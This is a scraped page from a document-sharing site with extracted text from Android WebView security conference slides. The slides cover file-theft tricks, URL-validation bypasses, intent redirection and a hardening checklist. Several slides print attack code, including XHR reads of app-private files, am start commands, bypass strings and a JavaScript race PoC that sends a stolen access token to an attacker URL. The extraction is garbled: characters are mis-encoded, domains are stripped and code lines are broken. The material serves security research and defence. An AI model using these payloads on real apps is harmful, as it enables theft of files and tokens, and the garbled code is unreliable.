2020Android WebView安全攻防指南_第1頁(yè)
2020Android WebView安全攻防指南_第2頁(yè)
2020Android WebView安全攻防指南_第3頁(yè)
2020Android WebView安全攻防指南_第4頁(yè)
2020Android WebView安全攻防指南_第5頁(yè)
已閱讀5頁(yè),還剩31頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

AndroidWebView安全攻防指南2020?我介紹現(xiàn)?作于OPPO?午互聯(lián)?安全實(shí)驗(yàn)室,heen@id:heeeeen(曾?:?荷才露尖尖?)AndroidSecurityTopResearcherGooglePlayGPSRP致謝演講與?章CNCERT2016AndroidApp開放端?的安全POC2018:HackingAndroidVoIPforFunandProfitBundle??——Android序列化與反序列化不匹配漏洞詳解Android?錄WebView攻擊?WebView配置與使?WebViewURL校驗(yàn)WebView安全防御總結(jié)WebView攻擊?APP

利用APP對(duì)不當(dāng)配置和使用Intentdeeplink(間接通過(guò)瀏覽器)

loadDataWithBaseUrlloadDataevaluateJavascript特殊攻擊面:端口、網(wǎng)絡(luò)協(xié)議WebView安全攻防發(fā)展系統(tǒng)接口暴露

跨域配置不當(dāng) URL校驗(yàn)不當(dāng)導(dǎo)致RCE 導(dǎo)致文件竊(應(yīng)用克?。?/p>

頁(yè)、調(diào)用特權(quán)接口歷史漏洞Android4.4之前,系統(tǒng)存在JavaScriptInterface接口,可被反射調(diào)用執(zhí)行任意代碼(RCE)CVE-2012-6636CVE-2014-1939案例:某地圖appLAN環(huán)境命令執(zhí)?http://<手機(jī)ip>:6677/androidamap?action=yyy¶m2=value2&...&url=<evil-site>竊取短信POCWebView的配置與使?setAllowFileAccess是否允許訪問文件,默認(rèn)為truesetAllowFileAccessFromFileURLs(寬松同源策略)是否允許file域下的js訪問別的file域下的文件,APIlevel16及以后默認(rèn)為setAllowUniversalAccessFromFileURLs(更加寬松的同源策略)是否允許file域下的js訪問別的域,包括file://下的文件,APIlevel16及以后默認(rèn)為任意?件竊取1(應(yīng)?克隆)前提:setAllowFileAccess(true)setAllowFileAccessFromFileURLs(true)||setAllowUniversalAccessFromFileURLs(true)操縱加載也有可能操縱用戶點(diǎn)擊后無(wú)感知下載)下的惡意HTML/JS,通過(guò)AJAX竊取xmlHttpRequest.open(“GET”,“file:///data/data/<package>/private_file",false);任意?件竊取1(移花接?)只有setAllowFileAccess為True(默認(rèn)設(shè)置)呢?攻擊App 受害App1.1.操縱WebViewPrivateDB4.軟鏈接attack.htm2.訪問WebView3.延時(shí)讀取自身/p/chromium/issues/detail?id=144866任意?件竊取3(含沙射影)仍然只有setAllowFileAccess為true攻擊App 受害

惡意網(wǎng)址1.操縱WebView

payload

設(shè)置

document.cookieattack.htm=“x=payload”attack.htm軟鏈接5.訪問再次操縱

Cookiesx=payload

訪問效果Cookies被污染控制WebView訪問攻擊者共享的symlink.html危險(xiǎn)的loadDataWithBaseURL域名和內(nèi)容同時(shí)可控,則可構(gòu)造任意域下的XSS1publicvoidloadDataWithBaseURL(StringbaseUrl,2Stringdata,3StringmimeType,4Stringencoding,5StringhistoryUrl)案例:GooglePlay某流?App?系列deeplink導(dǎo)致WebView加載任意urlvictim-app://c/receipt?url={url},原本用于調(diào)用GoogleDoc服務(wù)預(yù)覽pdfVictimAppWebViewGoogleDoc服務(wù)VictimApp文檔服務(wù)器VictimAppWebViewGoogleDoc服務(wù)VictimApp文檔服務(wù)器案例:GooglePlay某流?Appdeeplink加載任意fragment,轉(zhuǎn)化為WebViewloadDataWithBaseURL漏洞利?victim-app://c/contact/2?fragmen_class=<fragment>可啟動(dòng)任意fragment,并可通過(guò)IntentExtra傳參尋找到?個(gè)帶WebView的Fragment:GoogleMapWebViewFragment可污染loadDataWithBaseURL的前兩個(gè)參數(shù),構(gòu)造域下的XSSwebview.loadDataWithBaseURL("","google-map.html","text/html",...);<scriptsrc="MAPURL?v=3.exp&sensor=false&language=LANGTOKEN®ion=REGIONTOKEN"></script>安全建議基本配置setAllowFileAccess(false)setAllowFileAccessFromFileURLs(false)setAllowUniveralAccessFromFileURLs(false)setAllowContentAccess(false)加載確定的HTML,可使?asset?錄WebSettingswebSettingsWebSettingswebSettings=webView.getSettings();webSettings.setAllowFileAccess(false);webView.loadUrl("file:///android_asset/sample/index.html");防范?錄穿越,對(duì)?件名進(jìn)?過(guò)濾盡量不使?loadDataWithBaseUrlWebViewURL校驗(yàn)基本問題ifif(checkDomain(url)){enableJavaScriptInterface();//或者webView.load(url)3}?個(gè)簡(jiǎn)單案例ifif(url.startsWith("file://"){setJavaScriptEnbled(false);}else{5}有多種繞過(guò)?法:?寫字?:“File://”前?加個(gè)空格:“ file://”字符編碼:“file:%2F/”可正常訪問的畸形路徑:“file:sdcard/attack/html”或“file:/\//sdcard/attack.html”if(Uri.parse(url).getScheme().equalsIgnoreCase("file")) 常?url校驗(yàn)失效if(host.if(host.endsWith("")){enableJavascriptInterface()}繞過(guò):修復(fù):endsWith(“.”)使?startsWith、contains、indexOf、正則匹配等?嚴(yán)格字符串匹配if(host.startsWith(""))if(host.startsWith("")){3}Uri系統(tǒng)漏洞繞過(guò):CVE-2017-13274“\”繞過(guò)uriString="\\@";Stringhost=Uri.parse(uriString).getHost();Log.d("Wow",if(host.equals("")||host.endsWith(".")||host.startsWith("")){6}正確:WebView.loadUrl正確加載,將“\”識(shí)別為”/”/@ww

通過(guò)host校驗(yàn)1105511055D:錯(cuò)誤:Uri.parse未對(duì)”\”進(jìn)?處理,未按照WhatWG規(guī)范將”\”識(shí)別為path的開始,將@后?的內(nèi)容視為host?些案例某視頻編輯app:url校驗(yàn)繞過(guò)(修復(fù)兩次)amstart-n<package>/.HttpHookHandler-d“\\\@"某?樂appdeeplinkurl參數(shù)繞過(guò)amstart-aent.action.VIEW-d某聊天app:邏輯問題amstart–ent.action.VIEW-dvictim://tv@app將該字符替換為https://URLScheme繞過(guò)檢查了host,但未檢查scheme,可以通過(guò)“javascript:”繞過(guò)1uriString="javascript:///%0d%0awindow.location.href=\'\'";Stringhost=Uri.parse(uriString).getHost();Log.d("Wow",host);if(host.equals("")||host.endsWith(".")||host.startsWith("")){mVulWebViewUriBug.loadUrl(uriString);6}實(shí)際加載js代碼

12window.location.href=''也可以通過(guò)file:///sdcard/evil.html繞過(guò),某些版本W(wǎng)ebView可正常解析為file:///sdcard/evil.html反射構(gòu)造hearachicalUri繞過(guò)直接從外部取Uri,未經(jīng)過(guò)Uri.parse11Uriuri=getIntent().getData();booleanisOurDomain="https".equals(uri.getScheme())&&uri.getUserInfo()==null&&"".equals(uri.getHost());if(isOurDomain){6}反射構(gòu)造hearachicalUri繞過(guò)通過(guò)反射傳??個(gè)scheme、authoritiy和path,構(gòu)造?個(gè)形式為@的HierachicalUri實(shí)例即可繞過(guò)authority pathObjectauthority=partConstructor.newInstance("","");Objectpath=pathPartConstructor.newInstance("@","@");uri=(Uri)hierarchicalUriConstructor.newInstance("https",authority,path,null,null);利?服務(wù)端跳轉(zhuǎn)漏洞繞過(guò)?名單域名內(nèi)的服務(wù)端出現(xiàn)跳轉(zhuǎn)漏洞時(shí),仍然可以通過(guò)檢查,并調(diào)?javascriptInterface此時(shí)可以在shouldOverideUrlloading函數(shù)中攔截跳轉(zhuǎn),對(duì)跳轉(zhuǎn)的url進(jìn)?檢查1publicbooleanshouldOverrideUrlLoading(WebViewview,WebResourceRequestrequest){2if(checkDomain(request.getUrl().toString())){returnfalse; //通過(guò)檢查,允許跳轉(zhuǎn)5 }6 returntrue//未通過(guò)檢查,允許跳轉(zhuǎn)7}利?競(jìng)爭(zhēng)條件繞過(guò)URL校驗(yàn)jsCall的敏感函數(shù)中校驗(yàn)url,但使?跳轉(zhuǎn)url設(shè)置publicvoidonPageStarted(WebViewview,Stringurl,Bitmapfavicon){34}

classjsCall{Stringm_curUrl;@JavascriptInterfacepublicStringgetToken(){if(checkDomain(m_curUrl)){returnaccess_token;}else{return9. }10. }11.publicvoidsetCurUrl(Stringurl){m_curUrl=url;14. }漏洞利?通過(guò)設(shè)置跳轉(zhuǎn),onPageStarted/shouldOverideUrlLoading被回調(diào),此時(shí)mCurUrl已經(jīng)被改寫成?名單域名在當(dāng)前??的DOM還沒被銷毀的間隙(POC反復(fù)去嘗試),test權(quán)接?

惡意JS位于11<script>2vartest=function(){vartoken=jscall.getToken();if(!token.includes('unde')){document.location.href="http://?token="+token;1414</script>};for(i=0;i<1000};for(i=0;i<1000;i++){setTimeout(test,50+i);}document.location.href="http://myswhitelist}789101112";//in13IntentScheme校驗(yàn)問題WebView也可能處理intentscheme,若校驗(yàn)不嚴(yán),攻擊者可構(gòu)造Intent,形成IntentredirectionmVulWebViewIntentScheme.setWebViewClient(newWebViewClient(){@OverridepublicbooleanshouldOverrideUrlLoading(WebViewview,WebResourceRequestrequest){Uriuri=request.getUrl();Log.d("vulw",uri.toString());if(request.getUrl().getScheme().equals("intent")){try{Intentintent=Intent.parseUri(uri.toString(),Intent.URI_INTENT_SCHEME);startActivity(intent);安全的URL校驗(yàn)

接?級(jí)別的URL校驗(yàn),建議采?JsBridgeCheckDomain的使?位置加載前跳轉(zhuǎn)前在JavascriptInterface接?中在JS回調(diào)函數(shù)中

1.publicclassJsBridgeWebChromeClientextendsWebChromeClient{2.@Override publicfinalbooleanonJsPrompt(WebViewview,Stringurl,Stringmessage,StringdefaultValue,JsPromptResultresult){result.confirm();if(checkDomain(url))7. {JsCallJava.newInstance().call(view,message);returntrue;}else{returntrue;12. }13. }URL校驗(yàn)函數(shù)privatebooleancheckDomain(Stringurl)2.

1.Scheme檢查,建議只允許https3. if(!url.startsWith("http://")&&!url.startsWith("https://"))//對(duì)scheme進(jìn)行檢查,建議只使用https協(xié)議通信,避免中間人攻擊4. {5. returnfalse;6. }String[]whiteList=newString[]{".","."};.URIjava_url=null;try{

2.使用.URIjava_url=new.URI(url); //由于.Uri以及.Uri存在漏洞,推薦使用.URI對(duì)url字符串解析}catch(.URISyntaxExceptione){returnfalse;13. }

通過(guò)獲取hostStringinputDomain=java_url.getHost();//提取host,如果需要校驗(yàn)Path可以通過(guò)java_url.getPath()獲取Log.d(Secret.TAG, "inputDomain:"+inputDomain);for(StringwhiteDomain:whiteList)17. {whiteDomain=whiteDomain.startsWith(".")?whiteDomain:"."+whiteDomain;if(inputDomain.endsWith(whiteDomain))//對(duì)host進(jìn)行檢查,注意不要漏掉域名前面的點(diǎn)returntrue;21. }22. return false;23. }

使用endsWith含域名前面的點(diǎn)IntentScheme校驗(yàn)建議寫法//解析IntentSchemeURLIntentintent=Intent.parseUri(uri,flags);//禁止打開沒有BROWSABLE標(biāo)簽的Activity//禁止設(shè)置intent的組件intent.setC

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論